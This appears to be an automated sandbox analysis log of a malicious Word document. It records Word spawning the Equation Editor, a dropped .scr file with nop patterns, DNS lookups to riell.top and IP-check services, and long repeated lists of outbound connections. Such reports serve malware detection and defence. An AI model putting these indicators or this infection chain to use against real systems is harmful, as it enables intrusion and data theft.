
Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_001C5038
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 001C7B81h	10_2_001C78C1
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 001C5D07h	10_2_001C5B18
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 001C6691h	10_2_001C5B18
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 001C8143h	10_2_001C7D30
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 001C6A01h	10_2_001C6740
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 001C72C1h	10_2_001C7000
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_001C584B
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 001C8143h	10_2_001C8072
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 001C6E61h	10_2_001C6BA0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 001C7721h	10_2_001C7460
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_001C566A
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F12D1h	10_2_003F1028
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FC2D1h	10_2_003FC028
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F9711h	10_2_003F9468
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F46F1h	10_2_003F4448
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F4B49h	10_2_003F48A0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F1729h	10_2_003F1480
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FC729h	10_2_003FC480
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F4FA1h	10_2_003F4CF8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F9B91h	10_2_003F98E8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F1B81h	10_2_003F18D8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FCC15h	10_2_003FC8D8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F1FD9h	10_2_003F1D30
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F53F9h	10_2_003F5150
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F9FE9h	10_2_003F9D40
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_003F79AE
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F5851h	10_2_003F55A8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FA441h	10_2_003FA198
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F2431h	10_2_003F2188
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FA899h	10_2_003FA5F0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F2889h	10_2_003F25E0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F2CE1h	10_2_003F2A38
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F5CA9h	10_2_003F5A00
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FACF1h	10_2_003FAA48
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FB149h	10_2_003FAEA0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_003F7698
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F3139h	10_2_003F2E90
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F3591h	10_2_003F32E8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F05C9h	10_2_003F0320
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FB5CAh	10_2_003FB320
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F0A21h	10_2_003F0778
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FBA21h	10_2_003FB778
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F39E9h	10_2_003F3740
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F3E41h	10_2_003F3B98
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F4299h	10_2_003F3FF0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003F0E79h	10_2_003F0BD0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 4x nop then jmp 003FBE79h	10_2_003FBBD0

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: riell.top
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: reallyfreegeoip.org

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
